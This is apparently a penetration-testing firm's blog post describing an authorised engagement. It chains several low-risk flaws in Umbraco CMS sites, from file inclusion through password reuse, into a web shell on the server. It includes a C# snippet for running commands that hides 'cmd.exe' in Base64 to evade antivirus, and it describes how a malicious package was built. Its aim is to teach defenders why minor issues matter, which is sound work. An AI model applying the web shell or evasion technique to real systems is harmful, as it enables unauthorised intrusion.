•  Oxford: +44 (0)1865 877830 
  • Manchester: +44 (0)161 713 0176 
  •  London: +44 (0)203 5983740 
  •  New York: +1 646-781-7580 
  • Dubai: +971 (0)4 427 0429

What is the Risk if You Don't Fix Perceived Meaningless Vulnerabilities?

You are here



What is the Risk if You Don't Fix Perceived Meaningless Vulnerabilities?

In a recent external penetration test, I was able to chain multiple vulnerabilities together allowing me to fully compromise one of the client's servers. Whilst many of these vulnerabilities were low risk it is important to take care of every security vulnerability to minimise risk to systems.

The scope was large and the organisation had many websites built on the Umbraco CMS. My colleague, Robin, identified a local file inclusion (LFI) vulnerability (vulnerability number one) in the Umbraco CMS (version <= 7.2.1). He wrote about this following one of his previous engagements a year ago. As I grew familiar with the client's network and websites, I went through them one by one attempting to spot the ones that could be vulnerable to LFI.

Luckily for me, one of the websites was vulnerable (website1). Initially, I attempted reading well-known Windows files, such as the hosts file by requesting a URL like the following, where the "s" query string is "C:\Windows\system32\drivers\etc\hosts" Base64 encoded:


And it worked. At this moment I could have stopped testing and simply reported it. However, I wanted to attempt to exploit it further so I could demonstrate to the client the potential security implications of the vulnerability. Moving on, I attempted reading the Windows Security Account Manager (SAM) file at "%SYSTEMROOT%\repair\SAM" with no luck. Then, I started trying to read the "Web.config" file from the web application's webroot, because it may contain credentials. Knowing that the web server in place was Microsoft IIS, I spent time trying to guess the website's webroot folder, for example "c:\inetpub\wwwroot\website1", but I couldn’t find it.

Moving on to another website (website2), one of the first things I like looking for is if there is a robots.txt file in place and if so, are there any interesting directories exposed in it (vulnerability number two). This website did and it was exposing multiple directories, out of which one seemed interesting. Exposing directories in the robots.txt file is typically a low risk issue. It provides helpful information to an attacker regarding the website's file system or could give them access to resources which are not supposed to be indexed by search engines. So, I tried requesting that directory and received a detailed ASP.NET error (vulnerability number three), as shown below.

detailed website error exploit penetration testing

The ASP.NET error was exposing the full path of a website's file, as you can see in the bottom of the screenshot. It is obvious the full path to the website's installation was quite complex.

The full path allowed me to understand their file system’s structure which would have given me more chances to guess the full path of the "Web.config" file in the first website which was vulnerable to LFI (website1). This was not necessary as both websites were running on the same server. This meant I could exploit the LFI vulnerability in website1 in order to read the "Web.config" file from website2, as I knew the full path to its installation. All I wanted was to gain access to a configuration file which would potentially expose service credentials so I could demonstrate the impact of the LFI vulnerability. Five minutes later, I had managed to work out the exact full path of the "Web.config" file and read it, as shown below.

penetration testing web config file

Why was I able to read the "Web.config" file of a different website's installation? It usually means lack of isolation of web applications sharing the same server (vulnerability number four).

As expected, I found multiple database connection strings in there, many of them commented-out, most likely because they were old configuration directives. Anything unnecessary should be removed from production environments, whether they are configuration directives, services or files (vulnerability number five). All of the passwords appeared to be randomly generated, apart from one.

Having that password, I could attempt to login to various services by correctly guessing the username. Initially, I tried logging in with that password as the "admin" user in the Umbraco administrator panel of every Umbraco installation, and that gave me administrative access to four websites. At this point, there are two security issues here:

  • Insufficient Separation of Administration Functionality (vulnerability number six). An external user shouldn't be able to reach the administrator's login panel externally on the same domain.
  • Password Re-Use (vulnerability number seven). Using the same password or tiny variations of it in various services is a very common security issue.


Having gained access to these admin panels, I started poking around for any vulnerable Umbraco packages. One of them was vulnerable to cross-site scripting, but that wouldn't allow me to compromise the server. Since the Umbraco CMS is extendible by packages, I could install any new package. I could even create my own malicious package, which if accepted by the website, installed and executed properly, would allow me to execute commands on the server. Umbraco CMS is fine with that, since it warns its users to only install packages from sources they trust:

uploading malicious web shell example

Creating an Umbraco package was straightforward, as I only had to create a "package.xml" file (instructs the Umbraco CMS how to handle the package) along with an ASP.NET file inside a ZIP file, which would in the end be my web shell.

After creating a malicious Umbraco package and testing on my local Umbraco CMS installation of the same version, I got a web shell package to work. I used one simple .aspx webshell that we maintain in our private GitLab, along with the required "package.xml" file. This would spawn a new process, which would be the Windows' Command Prompt ("cmd.exe") or PowerShell and it would then accept commands from a simple HTML form.

It was now time to test it on the target website. Uploading the web shell package and trying to access it at "https://www.example.com/dionach/dshell.aspx", gave me a 404 "File not found" error. That could mean two things; either the file was being uploaded in a different path from the one I chose in the "package.xml" file or an antivirus mechanism was in place deleting the malicious file. Next, I uploaded another package which contained a naive .aspx file which basically echoed, "Hello World", and it confirmed my antivirus suspicions. Before attempting to bypass that by encoding my web shell with well-known tools such as msfvenom, I tried Base64 encoding the only part in the ASP.NET code that looked very suspicious and would be picked even by the simplest string matching antivirus:

string RunCmd(string arg) {
    ProcessStartInfo psi = new ProcessStartInfo();
    psi.FileName = Base64Decode("Y21kLmV4ZQ=="); 
    psi.Arguments = "/c "+arg;

That worked, and I now had a shell on the server.

At this point I stopped the testing and liaised with the client to resolve these vulnerabilities quickly. It is worth mentioning that an attacker would most likely try to escalate their privileges on that server and then keep moving further into the organisation's network and systems.

To sum up, I would like to stress the fact that out of the seven vulnerabilities only the first one would be considered high risk when viewed in isolation. In most instances, the remaining vulnerabilities would be classed as medium or low risk. What might appear to be a trivial issue may in fact serve as the vital link which chains together an otherwise unlikely exploitation path. Hopefully, that now makes my initial point clear; every security issue that is being reported should be resolved if possible.

Posted by Nick

Leave a comment